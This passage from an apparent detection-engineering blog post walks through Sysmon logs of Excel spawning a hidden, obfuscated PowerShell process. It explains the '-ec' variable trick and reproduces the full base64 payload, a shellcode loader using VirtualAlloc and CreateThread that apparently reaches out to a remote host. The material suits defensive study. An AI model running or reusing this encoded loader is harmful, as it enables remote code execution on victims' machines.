(gv Al).value.toString() ('JABpAHMAPQAnACQASwB1AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACsAIgAuACIAKwAiAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABUAGEAbwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVABXAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADMAYQAsAH0ANQA2ACwAfQA3ADkALAB9AGEANwAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0ANQAwACwAfQBlADgALAB9ADgANAAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0AMgBmACwAfQAzADgALAB9ADQAYgAsAH0ANgA4ACwAfQAzADgALAB9ADMAOQAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADAAMgAsAH0ANgAwACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADYALAB9ADYA'+'OAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBlADEALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0ANQAzACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA1ADMALAB9ADgAOQAsAH0AZQA3ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAwACwAfQAyADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAxADIALAB9ADkANgAsAH0AOAA5ACwAfQBlADIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQBjAGQALAB9ADgAYgAsAH0AMAA3ACwAfQAwADEALAB9AGMAMwAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AZQA1ACwAfQA1ADgALAB9AGMAMwAsAH0ANQBmACwAfQBlADgALAB9ADcAZAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AMwAxACwAfQAzADAALAB9ADIAZQAsAH0AMwA0ACwAfQAzADcALAB9ADIAZQAsAH0AMwA0ACwAfQAzADcALAB9ADIAZQAsAH0AMwAyACwAfQAzADYALAB9ADAAMAAiADsAJABaAHUAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAEsAdQAgAC0ATgBhAG0AZQAgACIAVQBWACIAIAAtAG4AYQBtAGUAcwAgAHcAWAByADsAJABaAHUAPQAkAFoAdQAuAHIAZQBwAGwAYQBjAGUAKAAiAHcAWAByACIALAAgACIAVwBpACIAKwAiAG4AIgArACIAMwAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFQAVwAgAD0AIAAkAFQAVwAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAUQBoAEUAYQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFEAaABFAGEAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAFIATgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFQAVwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAFIATgA9ACQAVABXAC4ATAB9ADsAJABkAFYAPQAkAFoAdQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAVABhAG8AIAA9ACAAMAA7AGYAbwByACgAJAB2AFgAPQAwADsAJAB2AFgAIAAtAGwAZQAoACQAVABXAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHYAWAArACsAKQB7ACQAWgB1ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAZABWAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHYAWAApACwAIAAkAFQAVwBbACQAdgBYAF0ALAAgADEAKQB9ADsAJABaAHUAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAZABWACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAVABhAG8AKQA7ACQAWgB1ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwAHgAMAAwACwAJABkAFYALAAwACwAMAAsADAAKQA7ACcAOwAkAHEAegA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAaQBzACkAKQA7ACQAdQBtAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAFAATQA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABrAFgAdAAgAD0AIAAiAEMAOgBcACQAUABNAFwAcwB5AHMAdwBvAHcANgA0AFwAJABQAE0AJAB1AG0AXAB2ADEALgAwAFwAJAB1AG0AIgA7ACQASQB0AFgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQASQB0AFgAJwApAHsAJAB1AG0APQAgACQAawBYAHQAfQA7ACQAdgBGAD0AIgAgACQAdQBtACAAUwB3AGYAWAAgACQAcQB6ACIAOwAkAHYARgA9ACQAdgBGAC4AcgBlAHAAbABhAGMAZQAoACIAUwB3AGYAWAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHYARgA=')"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"</font></span></p><div><br /></div><div>Above we have Sysmon logging a process creation event for a PowerShell process. Note this process is a child of the previous Excel process. We can confirm this by looking at the parent process GUID and matching it against the process GUID from the previous process creation event. You could compare the parent process Ids, but again, this is not always foolproof given process Id reuse.</div><div><br /></div><div>As an aside here, many may assume Excel parenting PowerShell is immediately suspect, but in some enterprises, there may be legitimate Excel macros that spawn PowerShell or cmd.exe processes to execute some additional supporting process. You may think it ridiculous, but there are <a href="http://www.cosonok.com/2018/09/using-excel-and-vba-to-nslookup-and.html" target="_blank">examples of this to be found</a>.</div><div><br /></div><div>The tell that something is awry with this instance of PowerShell is found on the command-line. No, not the base64 blob, which is also commonly used benignly to protect binary data sent via protocols that can only handle ASCII or to protect formatting. Here's the part that gives it away, for me:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()</font></span></p></div><div><br /></div><div>What's going on here is clear obfuscation -- someone is trying to evade detection. Let's break this down a bit. </div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-variant-ligatures: no-common-ligatures;"><font size="2">/w 1</font></span> will set the window style to hidden, preventing the PowerShell window from popping up on the user's screen.</div><div><br /></div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-variant-ligatures: no-common-ligatures;"><font size="2">"sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()</font></span></div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><div style="color: black; font-family: times; font-variant-ligatures: normal;"></div><p></p><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="color: black; font-family: times; font-size: medium;">Above is where things get really suspect. In the line above the alias for </span><font face="courier" style="color: black; font-size: medium;">Set-Variable, sv,</font><font face="inherit"> is used to create a variable called </font><font face="courier">BvI</font><font face="inherit"> and its value is set to the hyphen character. Next, another variable, </font><font face="courier">AT</font><font face="inherit"> is created with a value of ec, next a variable named </font><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">Al</font><font face="inherit"> is set to the concatenation of the two previous variables, so -ec, short for -EncodedCommand. Next that variable is passed as an argument to another PowerShell instance followed by the base64 encoded command.</font></span></div></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What of the encoded command? If you run it through <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Decode_text('UTF-16LE%20(1200)')&input=SkFCcEFITUFQUUFuQUNRQVN3QjFBRDBBSndBbkFGc0FSQUJzQUd3QVNRQnRBSEFBYndCeUFIUUFLQUFvQUNJQWJRQnpBSFlBWXdCeUFIUUFJZ0FyQUNJQUxnQWlBQ3NBSWdCa0FHd0FiQUFpQUNrQUtRQmRBSEFBZFFCaUFHd0FhUUJqQUNBQWN3QjBBR0VBZEFCcEFHTUFJQUJsQUhnQWRBQmxBSElBYmdBZ0FFa0FiZ0IwQUZBQWRBQnlBQ0FBWXdCaEFHd0FiQUJ2QUdNQUtBQjFBR2tBYmdCMEFDQUFaQUIzQUZNQWFRQjZBR1VBTEFBZ0FIVUFhUUJ1QUhRQUlBQmhBRzBBYndCMUFHNEFkQUFwQURzQVd3QkVBR3dBYkFCSkFHMEFjQUJ2QUhJQWRBQW9BQ0lBYXdCbEFISUFiZ0JsQUd3QU13QXlBQ0lBS3dBaUFDNEFJZ0FyQUNJQVpBQnNBR3dBSWdBcEFGMEFjQUIxQUdJQWJBQnBBR01BSUFCekFIUUFZUUIwQUdrQVl3QWdBR1VBZUFCMEFHVUFjZ0J1QUNBQVNRQnVBSFFBVUFCMEFISUFJQUJEQUhJQVpRQmhBSFFBWlFCVUFHZ0FjZ0JsQUdFQVpBQW9BRWtBYmdCMEFGQUFkQUJ5QUNBQWJBQndBRlFBYUFCeUFHVUFZUUJrQUVFQWRBQjBBSElBYVFCaUFIVUFkQUJsQUhNQUxBQWdBSFVBYVFCdUFIUUFJQUJrQUhjQVV3QjBBR0VBWXdCckFGTUFhUUI2QUdVQUxBQWdBRWtBYmdCMEFGQUFkQUJ5QUNBQWJBQndBRk1BZEFCaEFISUFkQUJCQUdRQVpBQnlBR1VBY3dCekFDd0FJQUJKQUc0QWRBQlFBSFFBY2dBZ0FHd0FjQUJRQUdFQWNnQmhBRzBBWlFCMEFHVUFjZ0FzQUNBQWRRQnBBRzRBZEFBZ0FHUUFkd0JEQUhJQVpRQmhBSFFBYVFCdkFHNEFSZ0JzQUdFQVp3QnpBQ3dBSUFCSkFHNEFkQUJRQUhRQWNnQWdBR3dBY0FCVUFHZ0FjZ0JsQUdFQVpBQkpBR1FBS1FBN0FGc0FSQUJzQUd3QVNRQnRBSEFBYndCeUFIUUFLQUFpQUdzQVpRQnlBRzRBWlFCc0FETUFNZ0FpQUNzQUlnQXVBQ0lBS3dBaUFHUUFiQUJzQUNJQUtRQmRBSEFBZFFCaUFHd0FhUUJqQUNBQWN3QjBBR0VBZEFCcEFHTUFJQUJsQUhnQWRBQmxBSElBYmdBZ0FFa0FiZ0IwQUZBQWRBQnlBQ0FBVmdCcEFISUFkQUIxQUdFQWJBQlFBSElBYndCMEFHVUFZd0IwQUNnQVNRQnVBSFFBVUFCMEFISUFJQUJzQUhBQVV3QjBBR0VBY2dCMEFFRUFaQUJrQUhJQVpRQnpBSE1BTEFBZ0FIVUFhUUJ1QUhRQUlBQmtBSGNBVXdCcEFIb0FaUUFzQUNBQWRRQnBBRzRBZEFBZ0FHWUFiQUJPQUdVQWR3QlFBSElBYndCMEFHVUFZd0IwQUN3QUlBQnZBSFVBZEFBZ0FIVUFhUUJ1QUhRQUlBQlVBR0VBYndBcEFEc0FXd0JFQUd3QWJBQkpBRzBBY0FCdkFISUFkQUFvQUNJQWJRQnpBSFlBWXdCeUFIUUFJZ0FyQUNJQUxnQWlBQ3NBSWdCa0FHd0FiQUFpQUNrQVhRQndBSFVBWWdCc0FHa0FZd0FnQUhNQWRBQmhBSFFBYVFCakFDQUFaUUI0QUhRQVpRQnlBRzRBSUFCSkFHNEFkQUJRQUhRQWNnQWdBRzBBWlFCdEFITUFaUUIwQUNnQVNRQnVBSFFBVUFCMEFISUFJQUJrQUdVQWN3QjBBQ3dBSUFCMUFHa0FiZ0IwQUNBQWN3QnlBR01BTEFBZ0FIVUFhUUJ1QUhRQUlBQmpBRzhBZFFCdUFIUUFLUUE3QUNjQUp3QTdBQ1FBVkFCWEFEMEFJZ0I5QUdVQU9BQXNBSDBBT0FBeUFDd0FmUUF3QURBQUxBQjlBREFBTUFBc0FIMEFNQUF3QUN3QWZRQTJBREFBTEFCOUFEZ0FPUUFzQUgwQVpRQTFBQ3dBZlFBekFERUFMQUI5QUdNQU1BQXNBSDBBTmdBMEFDd0FmUUE0QUdJQUxBQjlBRFVBTUFBc0FIMEFNd0F3QUN3QWZRQTRBR0lBTEFCOUFEVUFNZ0FzQUgwQU1BQmpBQ3dBZlFBNEFHSUFMQUI5QURVQU1nQXNBSDBBTVFBMEFDd0FmUUE0QUdJQUxBQjlBRGNBTWdBc0FIMEFNZ0E0QUN3QWZRQXdBR1lBTEFCOUFHSUFOd0FzQUgwQU5BQmhBQ3dBZlFBeUFEWUFMQUI5QURNQU1RQXNBSDBBWmdCbUFDd0FmUUJoQUdNQUxBQjlBRE1BWXdBc0FIMEFOZ0F4QUN3QWZRQTNBR01BTEFCOUFEQUFNZ0FzQUgwQU1nQmpBQ3dBZlFBeUFEQUFMQUI5QUdNQU1RQXNBSDBBWXdCbUFDd0FmUUF3QUdRQUxBQjlBREFBTVFBc0FIMEFZd0EzQUN3QWZRQmxBRElBTEFCOUFHWUFNZ0FzQUgwQU5RQXlBQ3dBZlFBMUFEY0FMQUI5QURnQVlnQXNBSDBBTlFBeUFDd0FmUUF4QURBQUxBQjlBRGdBWWdBc0FIMEFOQUJoQUN3QWZRQXpBR01BTEFCOUFEZ0FZZ0FzQUgwQU5BQmpBQ3dBZlFBeEFERUFMQUI5QURjQU9BQXNBSDBBWlFBekFDd0FmUUEwQURnQUxBQjlBREFBTVFBc0FIMEFaQUF4QUN3QWZRQTFBREVBTEFCOUFEZ0FZZ0FzQUgwQU5RQTVBQ3dBZlFBeUFEQUFMQUI5QURBQU1RQXNBSDBBWkFBekFDd0FmUUE0QUdJQUxBQjlBRFFBT1FBc0FIMEFNUUE0QUN3QWZRQmxBRE1BTEFCOUFETUFZUUFzQUgwQU5BQTVBQ3dBZlFBNEFHSUFMQUI5QURNQU5BQXNBSDBBT0FCaUFDd0FmUUF3QURFQUxBQjlBR1FBTmdBc0FIMEFNd0F4QUN3QWZRQm1BR1lBTEFCOUFHRUFZd0FzQUgwQVl3QXhBQ3dBZlFCakFHWUFMQUI5QURBQVpBQXNBSDBBTUFBeEFDd0FmUUJqQURjQUxBQjlBRE1BT0FBc0FIMEFaUUF3QUN3QWZRQTNBRFVBTEFCOUFHWUFOZ0FzQUgwQU1BQXpBQ3dBZlFBM0FHUUFMQUI5QUdZQU9BQXNBSDBBTXdCaUFDd0FmUUEzQUdRQUxBQjlBRElBTkFBc0FIMEFOd0ExQUN3QWZRQmxBRFFBTEFCOUFEVUFPQUFzQUgwQU9BQmlBQ3dBZlFBMUFEZ0FMQUI5QURJQU5BQXNBSDBBTUFBeEFDd0FmUUJrQURNQUxBQjlBRFlBTmdBc0FIMEFPQUJpQUN3QWZRQXdBR01BTEFCOUFEUUFZZ0FzQUgwQU9BQmlBQ3dBZlFBMUFEZ0FMQUI5QURFQVl3QXNBSDBBTUFBeEFDd0FmUUJrQURNQUxBQjlBRGdBWWdBc0FIMEFNQUEwQUN3QWZRQTRBR0lBTEFCOUFEQUFNUUFzQUgwQVpBQXdBQ3dBZlFBNEFEa0FMQUI5QURRQU5BQXNBSDBBTWdBMEFDd0FmUUF5QURRQUxBQjlBRFVBWWdBc0FIMEFOUUJpQUN3QWZRQTJBREVBTEFCOUFEVUFPUUFzQUgwQU5RQmhBQ3dBZlFBMUFERUFMQUI5QUdZQVpnQXNBSDBBWlFBd0FDd0FmUUExQUdZQUxBQjlBRFVBWmdBc0FIMEFOUUJoQUN3QWZRQTRBR0lBTEFCOUFERUFNZ0FzQUgwQVpRQmlBQ3dBZlFBNEFHUUFMQUI5QURVQVpBQXNBSDBBTmdBNEFDd0FmUUEyQUdVQUxBQjlBRFlBTlFBc0FIMEFOd0EwQUN3QWZRQXdBREFBTEFCOUFEWUFPQUFzQUgwQU53QTNBQ3dBZlFBMkFEa0FMQUI5QURZQVpRQXNBSDBBTmdBNUFDd0FmUUExQURRQUxBQjlBRFlBT0FBc0FIMEFOQUJqQUN3QWZRQTNBRGNBTEFCOUFESUFOZ0FzQUgwQU1BQTNBQ3dBZlFCbUFHWUFMQUI5QUdRQU5RQXNBSDBBTXdBeEFDd0FmUUJrQUdJQUxBQjlBRFVBTXdBc0FIMEFOUUF6QUN3QWZRQTFBRE1BTEFCOUFEVUFNd0FzQUgwQU5RQXpBQ3dBZlFBMkFEZ0FMQUI5QURNQVlRQXNBSDBBTlFBMkFDd0FmUUEzQURrQUxBQjlBR0VBTndBc0FIMEFaZ